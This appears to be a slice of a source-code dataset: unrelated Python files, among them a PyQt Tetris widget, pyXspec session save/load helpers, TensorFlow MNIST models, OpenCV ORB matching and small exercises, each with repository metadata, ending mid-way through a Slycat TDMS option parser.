            """Arrow keys: left/right/down move the piece, up rotates it."""
            if sceneKeyEvent.key() == Qt.Key_Left:
                self.tetris.move_left()
            if sceneKeyEvent.key() == Qt.Key_Right:
                self.tetris.move_right()
            if sceneKeyEvent.key() == Qt.Key_Down:
                self.tetris.move_down()
            if sceneKeyEvent.key() == Qt.Key_Up:
                self.tetris.rotate()
    class QView(QGraphicsView):
        """Antialiased, scrollbar-free view of the board (rotated 90° and mirrored)."""
        def __init__(self, scene: 'QTetris.QScene'):
            super(QTetris.QView, self).__init__()
            self.setTransform(QTransform().rotate(+90).scale(+1, -1))
            self.setMinimumSize(100, 200)
            self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
            self.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
            self.setRenderHints(QPainter.Antialiasing)
            self.setFrameStyle(QFrame.NoFrame)
            # Needed so mouseMoveEvent fires without a button held down.
            self.setMouseTracking(True)
            self.setScene(scene)
    def __init__(self):
        """Build the game model and the UI, then spawn the first piece and start ticking."""
        super(QTetris, self).__init__()
        self.tetris = None
        self.timer = None
        self.initGame()
        self.view = None
        self.scene = None
        self.initUI()
        self.show()
        self.tetris.spawn()
        self.timer.start()
    def initGame(self):
        """Create the Tetris model and the 350 ms gravity tick timer."""
        self.tetris = Tetris()
        self.tetris.delegate = self
        self.timer = QTimer()
        self.timer.setInterval(350)
        self.timer.timeout.connect(self.tetris.tick)
    def initUI(self):
        """Lay out the scene/view with no margins and show the initial score."""
        self.setLayout(QGridLayout())
        self.layout().setSpacing(0)
        self.layout().setContentsMargins(0, 0, 0, 0)
        self.scene = QTetris.QScene(self.tetris)
        self.view = QTetris.QView(self.scene)
        self.layout().addWidget(self.view)
        self.scored(0)
    def appeared(self, tetrimino: Tetris.Tetrimino):
        """Model callback: create a QTile item for every tile of a new tetrimino."""
        for tile in tetrimino:
            QTetris.QTile(self, tetrimino, tile)
    def scored(self, score: int):
        """Model callback: show the current score in the window title."""
        self.setWindowTitle(self.tr("Tetris - {score}").format(score=score))
    def terminated(self):
        """Model callback: show the game-over dialog, then restart the game."""
        QMessageBox.critical(self, self.tr("Game Over!"), self.tr("You toppped out."), QMessageBox.Ok)
        self.tetris.restart()
    def resizeEvent(self, resizeEvent: QResizeEvent):
        """Keep the whole board visible and centred when the widget resizes."""
        boundingRect = self.scene.itemsBoundingRect()
        self.view.fitInView(boundingRect, Qt.KeepAspectRatio)
        self.view.centerOn(boundingRect.center())
    def sizeHint(self) -> QSize:
        """Default widget size: 22 px per board cell."""
        return QSize(self.tetris.num_columns * 22, self.tetris.num_rows * 22)
| [
"vojta.molda@gmail.com"
] | vojta.molda@gmail.com |
ffea677591747dfafae0220b0d5104dd324b6948 | 6f45267c7e5e3167bc5c552ff57b1bb934c6911b | /load/save_load_xcm.py | 15c70ceb20f11eed3a16928ec1c8e86f5526a215 | [] | no_license | evandromr/pyxspec | d9c443680dfd508f2c6458157b3ade85b448fb66 | 410f1c457f2671cf11740d3bad4138bd04193939 | refs/heads/master | 2021-01-18T06:45:42.571328 | 2015-07-15T12:24:03 | 2015-07-15T12:24:03 | 39,135,887 | 0 | 1 | null | 2015-07-15T12:36:10 | 2015-07-15T12:36:10 | null | UTF-8 | Python | false | false | 3,891 | py | # pyxspec
def save_as_xcm(filename,s_type="all"):
    '''Save the current XSPEC session setup to an .xcm command file.

    Writes stat, method, abund, xsect, cosmo, delta and systematic, then
    depending on s_type ("all", "files" or "model") the loaded spectra
    with their ignore ranges and/or the model expression with all
    parameter values and links.
    '''
    # Only append ".xcm" when the name does not already end with it.
    if len(filename.split("."))>1 and filename.split(".")[-1]=="xcm":
        ext=""
    else:
        ext=".xcm"
    # NOTE(review): file handle is never closed explicitly (relies on GC).
    fw_xcm=open(filename+ext,"w")
    fw_xcm.write("statistic "+str(Fit.statMethod)+"\n")
    fw_xcm.write("method "+str(Fit.method)+" "+str(Fit.nIterations)+" "+str(Fit.criticalDelta)+"\n")
    fw_xcm.write("abund "+str(Xset.abund)+"\n")
    fw_xcm.write("xsect "+str(Xset.xsect)+"\n")
    fw_xcm.write("cosmo "+str(Xset.cosmo[0])+" "+str(Xset.cosmo[1])+" "+str(Xset.cosmo[2])+"\n")
    fw_xcm.write("xset delta "+str(Fit.delta)+"\n")
    fw_xcm.write("systematic "+str(AllModels.systematic)+"\n")
    if s_type=="all" or s_type=="files":
        # One "data" line per spectrum, plus one combined "ignore" line.
        ignore_str=""
        for x in range(1,AllData.nSpectra+1):
            s=AllData(x)
            fw_xcm.write("data "+str(x)+":"+str(x)+" "+s.fileName+"\n")
            if not s.ignoredString()=="":
                ignore_str+=str(x)+":"+s.ignoredString().replace(" ",",")+" "
        fw_xcm.write("ignore "+ignore_str+"\n")
    if s_type=="all" or s_type=="model":
        THEMODEL=AllModels(1)
        newpars=""
        fw_xcm.write("model "+THEMODEL.expression+"\n")
        for n in range(1,AllData.nGroups+1):
            c_m=AllModels(n)
            for k in range(1,c_m.nParameters+1):
                c_p=c_m(k)
                if c_p.link=="":
                    # Free parameter: value, delta and the four soft/hard limits.
                    fw_xcm.write(str(c_p.values[0])+" "+str(c_p.values[1])+" "+str(c_p.values[2])+" "+str(c_p.values[3])+" "+str(c_p.values[4])+" "+str(c_p.values[5])+"\n")
                else:
                    param=(c_m.nParameters*(n-1))+k
                    link=c_p.link
                    print link,link.split("=")[-1],param,int(link.split("=")[-1])>int(param)
                    # Links pointing at a later parameter are deferred as
                    # "newpar" lines after the model block; others go inline.
                    if int(link.split("=")[-1])>int(param):
                        fw_xcm.write("/\n")
                        newpars+="newpar "+str(param)+" "+c_p.link+"\n"
                    else:
                        fw_xcm.write(c_p.link+"\n")
        fw_xcm.write(newpars)
def load_xcm(filename):
    '''Load an .xcm command file (as written by save_as_xcm) into the pyXspec session.

    NOTE(review): relies on `re` and `np` (numpy) being imported at module
    level, and on the pyXspec globals (Fit, Xset, AllModels, AllData, Model)
    being available — confirm against the running environment.
    '''
    # While model_flag is set we are consuming the parameter lines that follow
    # a "model" command; the counters track which group/parameter comes next.
    model_flag=False
    model_param_counter=1
    model_num=1
    for cmd in open(filename):
        cmd=cmd.replace("\n","")
        if model_flag==True:
            # Normalise whitespace between the six value fields, then split.
            cmd=re.sub("\s+([\.|\d|\-|\w|\+]+)\s+([\.|\d|\-|\w|\+]+)\s+([\.|\d|\-|\w|\+]+)\s+([\.|\d|\-|\w|\+]+)\s+([\.|\d|\-|\w|\+]+)\s+([\.|\d|\-|\w|\+]+)","\g<1> \g<2> \g<3> \g<4> \g<5> \g<6>",cmd).split(" ")
            m=AllModels(model_num)
            p=m(model_param_counter)
            if "/" in cmd:
                # "/" keeps the default value; just advance the counters.
                model_param_counter+=1
                if model_param_counter>m.nParameters:
                    model_num+=1
                    model_param_counter=1
                    if model_num>AllData.nGroups:
                        model_flag=False
                continue
            elif "=" in cmd:
                # Linked parameter.
                p.link="".join(cmd).replace("=","")
            else:
                # Explicit value/delta/limits for this parameter.
                p.values=map(float,[ z for z in cmd if not z==''])
            model_param_counter+=1
            if model_param_counter>m.nParameters:
                model_num+=1
                model_param_counter=1
                if model_num>AllData.nGroups:
                    model_flag=False
        else:
            # Top-level command line: dispatch on the first word.
            cmd=cmd.split(" ")
            if cmd[0]=="statistic":
                Fit.statMethod=cmd[1]
            elif cmd[0]=="method":
                Fit.method=cmd[1]
                Fit.nIterations=int(cmd[2])
                Fit.criticalDelta=float(cmd[3])
            elif cmd[0]=="abund":
                Xset.abund=cmd[1]
            elif cmd[0]=="xsect":
                Xset.xsect=cmd[1]
            elif cmd[0]=="xset":
                if cmd[1]=="delta":
                    Fit.delta=float(cmd[2])
            elif cmd[0]=="systematic":
                AllModels.systematic=float(cmd[1])
            elif cmd[0]=="data":
                AllData(" ".join(cmd[1:]))
            elif cmd[0]=="ignore":
                AllData.ignore(" ".join(cmd[1:]))
            elif cmd[0]=="model":
                # Model definition; the following lines are parameter values.
                model_flag=True
                Model(" ".join(cmd[1:]))
            elif cmd[0]=="newpar":
                # Re-link a parameter: derive its data group and in-group index.
                m=AllModels(1)
                npmodel=m.nParameters #number of params in model
                group=int(np.ceil((float(cmd[1]))/npmodel))
                if not int(cmd[1])/npmodel==float(cmd[1])/npmodel:
                    param=int(cmd[1])-(int(cmd[1])/npmodel)*npmodel # int div so effectivly p-floor(p/npmodel)*npmodel
                else:
                    param=npmodel
                print group,param
                m=AllModels(group)
                p=m(param)
                if "=" in cmd[2] :
                    p.link="".join(cmd[2:]).replace("=","")
                else:
                    p.values=map(float,cmd[2:])
| [
"nocturnalastro@users.noreply.github.com"
] | nocturnalastro@users.noreply.github.com |
921edfd522099ada4d11a5a777e54f9d2dca360b | ff6248be9573caec94bea0fa2b1e4b6bf0aa682b | /StudentProblem/10.21.11.16/3/1569573269.py | 7413ac80608e26f988f405d4836f82d6a23f8641 | [] | no_license | LennartElbe/codeEvo | 0e41b1a7705204e934ef71a5a28c047366c10f71 | e89b329bc9edd37d5d9986f07ca8a63d50686882 | refs/heads/master | 2020-12-21T17:28:25.150352 | 2020-03-26T10:22:35 | 2020-03-26T10:22:35 | 236,498,032 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 525 | py | import functools
import typing
import string
import random
import pytest
def leap(j: int) -> bool:
    """Return True when year *j* is a leap year in the Gregorian calendar.

    A year is a leap year when it is divisible by 4, except century years,
    which must also be divisible by 400.
    """
    if j % 4 != 0:
        return False
    # Century years (divisible by 100) are leap years only when they are
    # also divisible by 400 (e.g. 2000 is, 1900 is not).
    if j % 100 == 0 and j % 400 != 0:
        return False
    return True
######################################################################
## Solution part 2 (tests)
# Expected output: True, True, False, False.
print(leap(2000))
print(leap(1660))
print(leap(1783))
print(leap(1800))
######################################################################
| [
"lenni.elbe@gmail.com"
] | lenni.elbe@gmail.com |
e68500422dcce2cd1da8991f72a686ab537ad639 | c87a2aa3752d51b2191e6d3fe09fd982b3d40f6d | /ABC105a.py | 815275dcc7669d23cc6e40f980ac6864c5bed261 | [] | no_license | kairyu33/atcoder | 54df0eea2f1c61f516ec2dbb4b62eeeb59903269 | 61f76826ebaaf2604bfa0ce016e3de52d0a10f39 | refs/heads/main | 2023-06-14T21:52:33.208802 | 2021-07-09T15:14:06 | 2021-07-09T15:14:06 | 376,199,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 154 | py | def main():
    # Read the two integers N and K from one line of standard input.
    n, k = map(int, input().split())
    # Print 0 when N is divisible by K, otherwise 1.
    if (n % k == 0):
        print(0)
    else:
        print(1)
# Run the solution only when executed as a script.
if __name__ == '__main__':
    main()
| [
"kairyu333@gmail.com"
] | kairyu333@gmail.com |
5e93c1c35118d3f32a43a70d453bab1653d00a3c | 1e9c4294652b0f4699d85516afd54fb5697b4800 | /python_exam/0803/mnist_cnn02.py | 13b66b9af78378cf5592a9f8e0ee4e3c7dc36b17 | [] | no_license | mgh3326/GyeonggiBigDataSpecialist | 89c9fbf01036b35efca509ed3f74b9784e44ed19 | 29192a66df0913c6d9b525436772c8fd51a013ac | refs/heads/master | 2023-04-06T07:09:09.057634 | 2019-06-20T23:35:33 | 2019-06-20T23:35:33 | 138,550,772 | 3 | 2 | null | 2023-03-24T22:43:06 | 2018-06-25T06:10:59 | Jupyter Notebook | UTF-8 | Python | false | false | 4,430 | py | # -*- coding: utf-8 -*-
"""
ml_day4 (2018.08.02)
"""
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets('./MNIST_data', one_hot=True)
import tensorflow as tf
sess = tf.InteractiveSession()
# Placeholders: flattened 28x28 images (784 values) and one-hot digit labels.
x = tf.placeholder(tf.float32, shape=[None, 784])
y_ = tf.placeholder(tf.float32, shape=[None, 10])
# Single-layer softmax-regression parameters, initialized to zeros.
W = tf.Variable(tf.zeros([784,10]))
b = tf.Variable(tf.zeros([10]))
sess.run(tf.global_variables_initializer())
y = tf.nn.softmax(tf.matmul(x,W) + b)
# Mean cross-entropy over the mini-batch.
# NOTE(review): tf.log(y) yields -inf when y underflows to 0;
# tf.nn.softmax_cross_entropy_with_logits is the numerically stable form.
cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))
train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)
# Train for 1000 steps on mini-batches of 50 images.
for i in range(1000):
    batch = mnist.train.next_batch(50)
    train_step.run(feed_dict={x: batch[0], y_: batch[1]})
# Accuracy: fraction of test images whose argmax prediction matches the label.
correct_prediction = tf.equal(tf.argmax(y,1), tf.argmax(y_,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print(accuracy.eval(feed_dict={x: mnist.test.images, y_: mnist.test.labels}))
#### CNN
def weight_variable(shape):
    """Create a weight Variable of the given shape, initialized from a
    truncated normal distribution with stddev 0.1."""
    init_values = tf.truncated_normal(shape, stddev=0.1)
    return tf.Variable(init_values)
def bias_variable(shape):
    """Create a bias Variable of the given shape, initialized to the
    constant 0.1."""
    init_values = tf.constant(0.1, shape=shape)
    return tf.Variable(init_values)
def conv2d(x, W):
    """Stride-1 2-D convolution of x with filter W, SAME (zero) padding."""
    return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
    """2x2 max pooling with stride 2 (halves each spatial dimension)."""
    return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
                        strides=[1, 2, 2, 1], padding='SAME')
###########################################
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets('./MNIST_data', one_hot=True)
import tensorflow as tf
sess = tf.InteractiveSession()
x = tf.placeholder(tf.float32, shape=[None, 784])
y_ = tf.placeholder(tf.float32, shape=[None, 10])
# Reshape flat 784-vectors back into 28x28 single-channel images.
x_image = tf.reshape(x, [-1,28,28,1])
## First convolutional layer (5x5 kernels, 1 input channel, 32 filters)
# W_conv1 = weight_variable([5, 5, 1, 32])
# b_conv1 = bias_variable([32])
W_conv1 = tf.Variable(tf.truncated_normal([5, 5, 1, 32], stddev=0.1))
b_conv1 = tf.Variable(tf.constant(0.1, shape=[32]))
# h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
# h_pool1 = max_pool_2x2(h_conv1)
conv2d01 = tf.nn.conv2d(x_image, W_conv1, strides=[1, 1, 1, 1], padding='SAME')
h_conv1 = tf.nn.relu(conv2d01 + b_conv1)
h_pool1 = tf.nn.max_pool(h_conv1, ksize=[1, 2, 2, 1],
                        strides=[1, 2, 2, 1], padding='SAME')
## Second convolutional layer (5x5 kernels, 32 -> 64 channels)
# W_conv2 = weight_variable([5, 5, 32, 64])
# b_conv2 = bias_variable([64])
W_conv2 = tf.Variable(tf.truncated_normal([5, 5, 32, 64], stddev=0.1))
b_conv2 = tf.Variable(tf.constant(0.1, shape=[64]))
# h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
# h_pool2 = max_pool_2x2(h_conv2)
conv2d02 = tf.nn.conv2d(h_pool1, W_conv2, strides=[1, 1, 1, 1], padding='SAME')
h_conv2 = tf.nn.relu(conv2d02 + b_conv2)
h_pool2 = tf.nn.max_pool(h_conv2, ksize=[1, 2, 2, 1],
                        strides=[1, 2, 2, 1], padding='SAME')
## Fully connected layer (7*7*64 pooled features -> 1024 units)
# W_fc1 = weight_variable([7 * 7 * 64, 1024])
# b_fc1 = bias_variable([1024])
W_fc1 = tf.Variable(tf.truncated_normal([7 * 7 * 64, 1024], stddev=0.1))
b_fc1 = tf.Variable(tf.constant(0.1, shape=[1024]))
h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
## Dropout (keep_prob fed as 0.5 during training, 1.0 during evaluation)
keep_prob = tf.placeholder(tf.float32)
h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
## Final softmax readout layer (1024 -> 10 classes)
# W_fc2 = weight_variable([1024, 10])
# b_fc2 = bias_variable([10])
W_fc2 = tf.Variable(tf.truncated_normal([1024, 10], stddev=0.1))
b_fc2 = tf.Variable(tf.constant(0.1, shape=[10]))
y_conv=tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)
## Model training and evaluation
# NOTE(review): tf.log(y_conv) can produce -inf when y_conv underflows to 0;
# tf.nn.softmax_cross_entropy_with_logits is the numerically stable form.
cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y_conv), reduction_indices=[1]))
train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
correct_prediction = tf.equal(tf.argmax(y_conv,1), tf.argmax(y_,1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
sess.run(tf.global_variables_initializer())
# Train for 20000 steps, logging training accuracy every 100 steps.
for i in range(20000):
    batch = mnist.train.next_batch(50)
    if i%100 == 0:
        train_accuracy = accuracy.eval(feed_dict={
            x:batch[0], y_: batch[1], keep_prob: 1.0})
        print("step %d, training accuracy %g"%(i, train_accuracy))
    train_step.run(feed_dict={x: batch[0], y_: batch[1], keep_prob: 0.5})
print("test accuracy %g"%accuracy.eval(feed_dict={
    x: mnist.test.images, y_: mnist.test.labels, keep_prob: 1.0}))
"mgh3326@naver.com"
] | mgh3326@naver.com |
206a46545ce7b3d6a02d574422bf55d6230e4d5b | 657a0e7550540657f97ac3f7563054eb4da93651 | /Boilermake2018/Lib/site-packages/twitter/__init__.py | c6e433f8e7a51315a4d2a247a08873855fb5ce5c | [
"LicenseRef-scancode-unknown-license-reference",
"CC0-1.0"
] | permissive | TejPatel98/voice_your_professional_email | faf4d2c104e12be61184638913ebe298893c5b37 | 9cc48f7bcd6576a6962711755e5d5d485832128c | refs/heads/master | 2022-10-15T03:48:27.767445 | 2019-04-03T16:56:55 | 2019-04-03T16:56:55 | 179,291,180 | 0 | 1 | CC0-1.0 | 2022-10-09T13:00:52 | 2019-04-03T13:01:50 | Python | UTF-8 | Python | false | false | 2,139 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2007-2018 The Python-Twitter Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A library that provides a Python interface to the Twitter API."""
from __future__ import absolute_import
# Package metadata constants (consumed by setup.py and introspection tools).
__author__ = 'The Python-Twitter Developers'
__email__ = 'python-twitter@googlegroups.com'
__copyright__ = 'Copyright (c) 2007-2016 The Python-Twitter Developers'
__license__ = 'Apache License 2.0'
__version__ = '3.4.2'
__url__ = 'https://github.com/bear/python-twitter'
__download_url__ = 'https://pypi.python.org/pypi/python-twitter'
__description__ = 'A Python wrapper around the Twitter API'
import json # noqa
try:
from hashlib import md5 # noqa
except ImportError:
from md5 import md5 # noqa
from ._file_cache import _FileCache # noqa
from .error import TwitterError # noqa
from .parse_tweet import ParseTweet # noqa
from .models import ( # noqa
Category, # noqa
DirectMessage, # noqa
Hashtag, # noqa
List, # noqa
Media, # noqa
Trend, # noqa
Url, # noqa
User, # noqa
UserStatus, # noqa
Status # noqa
)
from .api import Api # noqa
| [
"tpa244@uky.edu"
] | tpa244@uky.edu |
d920e855764cded63171a613b96a14801d525791 | 66932bac8dfdc4c107705e44294409fa1dd05f62 | /venv/bin/django-admin | 8f3f9f0a350610a30f5cdad40f7ccf0ef27a27d9 | [] | no_license | jatia/django | 6572d474738aade008930e7210ef0e4ca1c739be | 20a97ce78755fb65dd551cf92f8322316ab39984 | refs/heads/master | 2021-09-07T03:39:02.119441 | 2018-02-15T15:24:11 | 2018-02-15T15:24:11 | 117,251,942 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 296 | #!/home/jatia/workspace/django/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from django.core.management import execute_from_command_line
if __name__ == '__main__':
    # Strip an optional "-script.pyw" / ".exe" suffix from argv[0]
    # (as added by some script launchers), then hand control to
    # Django's command-line dispatcher.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(execute_from_command_line())
| [
"julissa.atia@gmail.com"
] | julissa.atia@gmail.com | |
96e111c9b79508abc86ab994ca72482efa2082de | 0db3ffb5060fd0d4a7e1ee59ab1a5f6766f35c11 | /4_Feature matching/code/4.6_KNN.py | b286eeff295cbf5749c3387ee1b852e1e517719a | [] | no_license | maibobo/Learn-cv | c525b780f0ce61d0906525dd51902aeab1ba8d75 | 928c6dae9c12427d1ae6dab7837657b68098f935 | refs/heads/master | 2020-06-14T10:36:25.655934 | 2019-07-03T12:50:44 | 2019-07-03T12:50:44 | 194,983,444 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,340 | py | # -*- coding:utf-8 -*-
import os
import cv2
import numpy as np
'''
Feature matching using the KNN (k-nearest-neighbour) matcher
on ORB keypoints/descriptors.
'''
img1 = cv2.imread('orb1.jpg',0) # query image (img1), loaded as grayscale
# img1 = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)
img2 = cv2.imread('orb2.jpg',0) ## train image (img2), loaded as grayscale
# img2 = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)
orb = cv2.ORB_create()
kp1, des1 = orb.detectAndCompute(img1, None)
kp2, des2 = orb.detectAndCompute(img2, None)
# Brute-force matcher with Hamming distance (ORB descriptors are binary).
bf = cv2.BFMatcher(cv2.NORM_HAMMING,crossCheck = False)
# For each descriptor keep the two best matches (k=2).
matches = bf.knnMatch(des1, des2, k=2)
print(type(matches), len(matches), matches[0])
# matches[0][0]: best match in img2 for the first img1 descriptor (smallest distance).
dMatch0 = matches[0][0]
# matches[0][1]: second-best match for the same descriptor (next-smallest distance).
dMatch1 = matches[0][1]
print('knnMatches', dMatch0.distance, dMatch0.queryIdx, dMatch0.trainIdx)
print('knnMatches', dMatch1.distance, dMatch1.queryIdx, dMatch1.trainIdx)
# (A ratio test would discard matches whose best/second-best distance ratio
# exceeds a chosen threshold; here all k-NN matches are drawn.)
img3 = None
img3 = cv2.drawMatchesKnn(img1, kp1, img2, kp2, matches, img3, flags=cv2.DRAW_MATCHES_FLAGS_DEFAULT)
img3 = cv2.resize(img3,(1000, 400))
cv2.imshow('KNN',img3)
cv2.waitKey()
cv2.destroyAllWindows()
| [
"42796626+maibobo@users.noreply.github.com"
] | 42796626+maibobo@users.noreply.github.com |
596fbd0f3ba50656e01ae10f54ce925cb0d45bc4 | 70a9b6201ed77235929f4561bfaf2baf20decd3e | /SelfStudy[Python]/Learn_Python/basics/changing_case_in_strings.py | 868b21704acd79a9f869cb7e466cb355c335b939 | [] | no_license | Troys-Code/Coding | 4cb4fce0a7e79dbdf18828e4d32974f58789098d | 5b8ee557e7fc2d1ee321c66ebedc596f72fa4bad | refs/heads/master | 2023-07-14T14:03:22.789272 | 2021-08-25T00:22:05 | 2021-08-25T00:22:05 | 343,971,313 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 619 | py | name = "troy schultz"
print(name.title()) # Prints Each First Letter In The String As Capitals
print(name.upper()) # Prints With All Characters Upper Case
print(name.lower()) # Prints With All Characters Lower Case
# (The two comments above were swapped in the original: .upper() uppercases,
# .lower() lowercases.)
# .lower() and .upper() are useful for user inputs to validate user input with less variations
# Troy tRoy trOy troY are all the same using these functions
# This makes it easy to not worry about the users capitalizations, so you would convert user inputs
# before storing them. Then when you want to display the information, you'll use whatever capitalization makes the most sense
# for each string
| [
"41653822+Troys-Code@users.noreply.github.com"
] | 41653822+Troys-Code@users.noreply.github.com |
3a5f62f6abb917dc1564d007536613a243d9b2b7 | 6e3dc22393206ffd334fe5510a11e7b914475ab9 | /tp1 Funciones/ej1.py | 72fd526e4e2fdcf03d442ee8ac2a33e8456ee0c0 | [] | no_license | Rodrigo00909/pythonfacultad1 | b9d3baf91818daf94bf7eb0a03f514e26a02953b | 39af8d9e9f285c0ce338e49edd7d2e2380e60c49 | refs/heads/main | 2023-02-26T08:01:32.664894 | 2021-02-05T00:55:07 | 2021-02-05T00:55:07 | 332,917,011 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,139 | py | # 1. Desarrollar una función que reciba tres números positivos y devuelva el mayor de
# los tres, sólo si éste es único (mayor estricto). En caso de no existir el mayor estricto devolver -1.
# No utilizar operadores lógicos (and, or, not). Desarrollar también un programa para ingresar los tres valores, invocar a la función y mostrar el
# máximo hallado, o un mensaje informativo si éste no existe.
# Maximo estricto = Que sea el mas grande y unico
# Ejecutar solo 1 programa
# Programa 1
def mayorPos(a, b, c):
    """Return the strict maximum of three positive numbers.

    The maximum is "strict" when it is unique among the three values;
    otherwise -1 is returned.  No logical operators (and/or/not) are
    used, as the exercise requires.
    """
    valores = [a, b, c]
    mayor = max(valores)
    # A strict maximum appears exactly once among the three values.
    if valores.count(mayor) == 1:
        return mayor
    return -1
# Main program
x = int(input("Ingrese un primer número: "))
y = int(input("Ingrese un segundo número: "))
z = int(input("Ingrese un tercer número: "))
# Bug fix: the original wrote `if mayorPos == -1:`, comparing the function
# object itself to -1 (always False), so "No existe un mayor estricto" was
# never printed.  Call the function once and test its result instead.
mayor = mayorPos(x, y, z)
if mayor == -1:
    print("No existe un mayor estricto")
else:
    print("El mayor es:", mayor)
# -----------------------------
# Programa 2
### Agregar la importancion de randint desde random
## Escribir un array que contenga los 3 numeros fecha. Recorrerlo agregandole la importacion random de randint, con rango de numeros 0 y 10
## Asignar los 3 numeros del array a algunas variables que luego seran trasladados como parametro a la funcion de mayor estricto.
## Agregar una validacion para que si el mayor es -1 entonces diga que no exista un mayor, en caso contrario que diga cual fue el mayor
from random import randint
def mayorEstr(a, b, c):
    """Return the strict maximum of three numbers, or -1 when the
    largest value is not unique.  Avoids logical operators (and/or/not)
    per the exercise statement."""
    ordenados = sorted((a, b, c), reverse=True)
    # If the two largest values coincide there is no strict maximum.
    if ordenados[0] != ordenados[1]:
        return ordenados[0]
    return -1
def verificarFecha():
    """Draw three random integers in [0, 10], print them, and report
    their strict maximum (or a message when there is none)."""
    numeros = [randint(0, 10) for _ in range(3)]
    resultado = mayorEstr(*numeros)
    print(numeros)
    if resultado == -1:
        print("No existe un mayor estricto")
    else:
        print(f"El mayor estricto es {resultado}")
# Programa Principal
verificarFecha() | [
"noreply@github.com"
] | noreply@github.com |
0f386418ae2dc0fc5c9218cff9565de3b2531ec0 | c8cfc8f3e3e1c0a4a856355ff90cceca3191ba77 | /web-client/slycat/web/client/dac_tdms_util.py | 136a011e4bb6fbd2c30e33ffa9eef052f01c2c29 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | sandialabs/slycat | 8fb41164c74a78f645ba3c4db6cb5e33e9b515c8 | 1af9aa38c7ffa5d3f02101cc057e5d2ff20897c0 | refs/heads/master | 2023-08-17T19:30:16.277591 | 2023-08-09T19:49:29 | 2023-08-09T19:49:29 | 11,371,048 | 69 | 24 | NOASSERTION | 2023-08-31T15:22:37 | 2013-07-12T14:50:39 | JavaScript | UTF-8 | Python | false | false | 11,283 | py | # Copyright (c) 2013, 2018 National Technology and Engineering Solutions of Sandia, LLC.
# Under the terms of Contract DE-NA0003525 with National Technology and Engineering
# Solutions of Sandia, LLC, the U.S. Government retains certain rights in this software.
# Module defining Dial-A-Cluster .tdms parser, options, and a utility for
# enumerating .tdms files.
# S. Martin
# 5/31/2023
# file manipulation
import os
import fnmatch
# arrays
import numpy as np
# TDMS error handling
class TDMSUploadError(Exception):
    """Raised when TDMS file discovery or upload cannot proceed.

    Attributes:
        message: human-readable description of the problem.
    """

    def __init__(self, message):
        # Bug fix: forward the message to Exception.__init__ so that
        # str(exc) and exc.args carry it (the original only stored it on
        # self.message, leaving str(exc) empty).
        super().__init__(message)
        self.message = message
# add tdms parser options for any dac model
def add_options(parser):
    """Register the Dial-A-Cluster TDMS parsing options on *parser*.

    Parameters
    ----------
    parser : argparse.ArgumentParser
        Parser to extend in place.

    Returns
    -------
    argparse.ArgumentParser
        The same parser, to allow chaining.
    """
    # Integer-valued options: (flag, default, help text).
    integer_options = [
        ("--min-time-points", 10,
         "Minimum number of time points per channel, integer >= 2. "
         "Default: %(default)s."),
        ("--min-channels", 2,
         "Minimum number of channels per text, integer >= 1. "
         "Default: %(default)s."),
        ("--min-num-shots", 1,
         "Channels must occur in at least this many shots, integer >= 0. "
         "Use zero to indicate that channel must occur in every shot. "
         "Default: %(default)s."),
        ("--num-landmarks", None,
         "Number of landmarks to use, integer >= 3. Can also use zero "
         "to indicate use of full dataset (no landmarks). Default: %(default)s."),
        ("--num-PCA-comps", 10,
         "Number of PCA components to use, integer >= 2. Note --num-landmarks "
         "over-rides --num-PCA-comps. Default: %(default)s."),
    ]
    for flag, default_value, help_text in integer_options:
        parser.add_argument(flag, default=default_value, type=int, help=help_text)

    # Boolean flag options: (flag, help text).
    flag_options = [
        ("--overvoltage", "Expecting overvoltage data."),
        ("--sprytron", "Expecting sprytron data."),
        ("--intersection",
         "Combine mismatched time steps using intersection. "
         "Default is to combine using union."),
        ("--do-not-infer-channel-units",
         "Do not infer channel units. Default is to infer channel units "
         "from channel name."),
        ("--do-not-infer-time-units",
         "Do not infer time units. Default is to assume unspecified units "
         "are seconds."),
    ]
    for flag, help_text in flag_options:
        parser.add_argument(flag, action="store_true", help=help_text)

    return parser
# parse tmds input parameters
def get_parms(arguments):
    """Translate parsed command-line *arguments* into the DAC TDMS
    parser parameter list.

    Returns a list of nine entries:
